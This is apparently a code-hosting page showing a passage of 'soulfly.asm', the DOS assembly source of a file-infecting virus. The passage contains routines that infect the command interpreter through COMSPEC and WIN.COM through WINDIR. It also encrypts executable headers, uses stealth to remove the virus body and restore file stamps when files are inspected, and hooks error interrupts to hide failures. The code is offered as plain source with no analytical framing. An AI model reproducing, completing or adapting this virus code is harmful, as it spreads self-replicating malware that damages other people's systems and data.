📄 soulfly.asm
字号:
CMP SI, DX ; No path was supplied?
JA Offset_OK
Adjust_DI: MOV SI, DX ; Then adjust DI.
Offset_OK: MOV DI, OFFSET Filename_Buffer
MOV CX, 12
PUSH DI
CLD
Conv_Filename: LODSB
CALL Make_Uppercase
STOSB
LOOP Conv_Filename
POP DI
POP SI
Comp_Filename: SEGCS
LODSB
CBW
XCHG CX, AX
CMP CX, DI ; NZ
JCXZ Exit_Scan_Line
PUSHA
SEGCS
REPE CMPSB
POPA
PUSHF
ADD SI, CX
POPF
JE Exit_Scan_Line
JMP Comp_Filename
Exit_Scan_Line: POPA
CLD
RETN
; DS:SI = Header.
Crypt_Header:
PUSHA
PUSH ES
PUSH CS
POP ES
MOV DI, SI
MOV BX, [SI.Header_Key]
MOV DX, [SI.Header_Slider]
MOV CL, (24 / 2)
Copy_Crypt_W: CLD
LODSW
XOR AX, BX
ROR BX, CL
ADD BX, DX
STOSW
LOOP Copy_Crypt_W
LODSW
STOSW
LODSW
STOSW
POP ES
POPA
RETN
Archivers DB 09, 'PKZIP.EXE'
DB 07, 'ARJ.EXE'
DB 07, 'LHA.EXE'
DB 07, 'RAR.EXE'
DB 10, 'BACKUP.EXE'
DB 07, 'FTP.EXE'
DB 0
Get_DTA:
MOV AX, 2F00h + Century
CALL OldInt21h
PUSH ES
POP DS
CWD ; Zero DX.
RETN
Check_Clean:
PUSHF
PUSHA
PUSH DS
PUSH ES
CALL Hook_Int24h
CALL Check_Handle
JS Exit_Clean_H
JB Exit_Clean_H
CALL Save_File_Pos
CALL Seek_Header
CALL Read_Header
CALL Crypt_Header
CALL Write_Header
MOV AX, 4202h
MOV CX, -1
MOV DX, -Virus_Size
CALL OldInt21h
INC CX ; Cut-off virusbody.
CALL Write_File
CALL Restore_File_Pos
SUB BYTE PTR File_Date+1, Century
CALL Restore_File_Stamp
Exit_Clean_H: CALL Unhook_Int24h
POP ES
POP DS
POPA
POPF
RETN
Hook_Int24h:
PUSHA
PUSH DS
PUSH CS
POP DS
MOV AX, 3524h
CALL OldInt21h
MOV Int24h, BX
MOV Int24h+2, ES
MOV AH, 25h
MOV DX, OFFSET NewInt24h
CALL OldInt21h
POP DS
POPA
RETN
Unhook_Int24h:
MOV AX, 2524h
LDS DX, DWORD PTR CS:Int24h
JMP OldInt21h
NewInt24h:
MOV AL, 03h
IRET
Save_File_Pos:
MOV AX, 4201h
XOR CX, CX
CWD
CALL OldInt21h
MOV CS:File_Pos_Lo, AX
MOV CS:File_Pos_Hi, DX
RETN
Restore_File_Pos:
MOV AX, 4200h
MOV CX, 0
File_Pos_Hi = WORD PTR $-2
MOV DX, 0
File_Pos_Lo = WORD PTR $-2
JMP OldInt21h
Seek_Header:
MOV AX, 4202h
DEC CX
MOV DX, -28
JMP OldInt21h
Read_Header:
PUSH CS
POP DS
MOV SI, OFFSET Header
MOV CX, 40h
MOV DX, SI
CALL Read_File
JC Exit_Read_Hdr
CMP AX, CX
Exit_Read_Hdr: RETN
Read_File:
MOV AH, 3Fh
JMP OldInt21h
Write_Header:
CALL Go_BOF
MOV CL, 24 ; Write updated header.
MOV DX, SI
Write_File: MOV AH, 40h
JMP OldInt21h
; Converts characters in AX to uppercase.
Make_Uppercase:
CMP AL, 'a'
JB Check_Upper_AH
CMP AL, 'z'
JA Check_Upper_AH
SUB AL, 'a' - 'A'
Check_Upper_AH: CMP AH, 'a'
JB Exit_Uppercase
CMP AH, 'z'
JA Exit_Uppercase
SUB AH, 'a' - 'A'
Exit_Uppercase: RETN
Check_Handle:
XOR SI, SI
MOV AX, 4400h
CALL OldInt21h
OR DL, DL
JS Exit_Chk_File
CALL Save_File_Stamp
MOV BP, SP
INC BP
INC BP
INC SI
Exit_Chk_File: RETN
Infect_ComSpec:
PUSHA
PUSH DS
POP ES
MOV AH, 62h ; Get current PSP.
INT 21h
XOR SI, SI
MOV DS, BX
MOV DS, DS:[SI+2Ch]
Comp_Env_Var: CMP DS:[SI], CL ; End of settings reached?
JZ Exit_Inf_ComSpec
MOV AX, DS:[SI+5]
CALL Make_Uppercase
XCHG BX, AX
MOV AX, DS:[SI]
CALL Make_Uppercase
CMP AX, 'OC' ; Look for 'COMSPEC='.
JNE Test_4_Win_Dir
CMP BX, 'CE'
JNE Test_4_Win_Dir
Found_ComSpec: MOV AX, 3D00h ; Infect command-interpreter.
LEA DX, [SI+8]
INT 21h
Test_4_Win_Dir: CMP AX, 'IW' ; Look for 'WINDIR='.
JNE Get_Next_Var
CMP BX, '=R'
JNE Get_Next_Var
PUSH SI
ADD SI, 7
MOV DI, OFFSET Filename_Buffer
MOV DX, DI
Copy_Byte_W_D: CLD
LODSB
OR AL, AL
JZ Win_Dir_Copied
STOSB
JMP Copy_Byte_W_D
Win_Dir_Copied: PUSH DS
PUSH ES
POP DS
MOV SI, OFFSET Win95_Init
MOV CL, 9
REP MOVSB
MOV AH, 3Dh ; Infect WIN.COM.
INT 21h
POP DS
POP SI
Get_Next_Var: CLD
Find_Next_Var: LODSB
OR AL, AL
JNZ Find_Next_Var
JMP Comp_Env_Var
Exit_Inf_ComSpec:
POPA
RETN
DB 0EAh
Check_4_EXE:
CMP [SI.EXE_Mark], 'ZM'
RETN
Win95_Init DB '\WIN.COM', 0
IF (($ - Start) MOD 2) EQ 1
DB 0
ENDIF
End_Encrypted:
Host_Bytes DW 'ZM'
DW 0
DW 0
DW 0
DW 0
DW 0
DW 0
DW 0
DW 0
DW 0
DW OFFSET Carrier
DW 0
DW 0
DW 0
Virus_End:
Int24h DW 0, 0
File_Name DW 0, 0
Header DB 40h DUP(0)
Filename_Buffer DB 32 DUP(0)
Buffer DB Virus_Size DUP(0)
Virus_End_Mem:
Carrier:
MOV AX, 4C00h
INT 21h
; ------------- SOME STRUCTURES ---------------------------------------------
COM_Header STRUC
Jump DB 0
Displacement DW 0
COM_Header ENDS
EXE_Header STRUC
EXE_Mark DW 0 ; Marker valid .EXE-file: MZ or ZM.
Image_Mod_512 DW 0
Image_512_Pages DW 0
Reloc_Items DW 0
Header_Size_Mem DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
Encrypt_Header STRUC
DB 24 DUP(0)
Header_Key DW 0
Header_Slider DW 0
Encrypt_Header ENDS
Find_FN_Handle STRUC
Handle_Reserved DB 21 DUP(0)
Handle_Attr DB 0
Handle_Time DW 0
Handle_Date DW 0
Handle_Size DW 0, 0
Handle_Name DW 6 DUP(0)
DB 0
Find_FN_Handle ENDS
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS
Push_All_Stack STRUC
Reg_ES DW 0
Reg_DS DW 0
Reg_DI DW 0
Reg_SI DW 0
Reg_BP DW 0
Reg_SP DW 0
Reg_BX DW 0
Reg_DX DW 0
Reg_CX DW 0
Reg_AX DW 0
Reg_Flags DW 0
Reg_Ret_Addr DW 0
Push_All_Stack ENDS
Find_FN_Win95 STRUC
Win95_Attr DD 0
Win95_Created DD 0, 0
Win95_Access DD 0, 0
Win95_Time DW 0
Win95_Date DW 0
DD 0
Win95_Size_Hi DD 0
Win95_Size_Lo DD 0
Win95_Reserved DB 8 DUP(0)
Win95_Win_Name DB 260 DUP(0)
Win95_DOS_Name DB 14 DUP(0)
Find_FN_Win95 ENDS
MCB_Header STRUC
MCB_Type DB 0 ; M = not last block, Z = last block.
MCB_PSP DW 0 ; PSP-segment of this block.
MCB_Size_Mem DW 0 ; Size of block in paragraphs.
MCB_Dunno DB 3 DUP(0) ; Don't care, don't need it.
MCB_Program DW 4 DUP(0) ; Filename of program of this block.
MCB_Header ENDS
END START
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -